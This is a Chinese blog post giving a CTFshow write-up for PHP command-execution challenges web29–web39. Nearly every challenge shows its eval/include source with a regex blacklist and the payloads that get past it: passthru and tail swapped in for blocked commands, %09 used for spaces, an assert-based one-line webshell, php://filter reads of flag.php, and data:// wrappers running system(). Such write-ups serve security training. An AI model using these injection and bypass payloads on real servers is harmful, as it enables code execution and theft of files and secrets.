CTFshow命令执行

web29

1

/?c=system("tac fla?.php");

2

/?c=system("tac f*.php>1.txt");

再访问1.txt

web30

1

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

?c=`cp fla?.??? 1.txt`;

再访问1.txt

2

首先过滤了system，可以用passthru代替

tail :如果tac被拦截，可以使用这个

?c=passthru("tail fla*");

?c=passthru("tac fla*");

3.

也可以上传一句话

https://61159e34-f5b4-42cc-9437-25b9721b770f.challenge.ctf.show/?c=assert($_POST['j']);

j=phpinfo();

j=system("ls");

j=system("cat flag.php");

flag在源码里面

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

过滤的空格，可以用%09绕过

?c=passthru("tail%09fla*");

web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

先上一个马，然后伪协议读取文件

get:

https://1a29ac75-5b49-4d63-a558-acae3133cc2c.challenge.ctf.show/?c=include"$_POST[1]"?>

post:

1=php://filter/read=convert.base64-encode/resource=flag.php

web33

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

这题过滤了""

把上题的payload改一下就好了

https://1a29ac75-5b49-4d63-a558-acae3133cc2c.challenge.ctf.show/?c=include$_POST[1]?>

1=php://filter/read=convert.base64-encode/resource=flag.php

web34

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

同上

web35

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

同上

web36

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}

}else{
highlight_file(__FILE__);
}

和上题相比过滤了数字

?c=include$_POST[a]?>

a=php://filter/read=convert.base64-encode/resource=flag.php

就可以得到flag了

web37

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

用data伪协议

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOz8%2B

<?php system("tac flag.php");?>

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg%3D%3D

web38

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

同上

web39

?c=data://text/plain,<?php system("tac fla*");?>

posted @ 2024-11-17 10:16 WTT0011 阅读(9) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CTFshowPHP特性

· 2024BaseCTF-week1wp

· ctfshow-web-命令执行（web29-77、web118-124）

· ctfshow web入门命令执行 web29-36

· [CTFshow] 文件包含 78~88,116~117

公告

昵称： WTT0011
园龄： 7个月
粉丝： 5
关注： 0

+加关注

2025年3月

日

一

二

三

四

五

六

WTT001

CTFshow命令执行

CTFshow命令执行

web29

1

2

web30

1

2

3.

web31

web32

web33

web34

web35

web36

web37

web38

web39

公告

搜索

常用链接

随笔分类

随笔档案

相册

阅读排行榜

推荐排行榜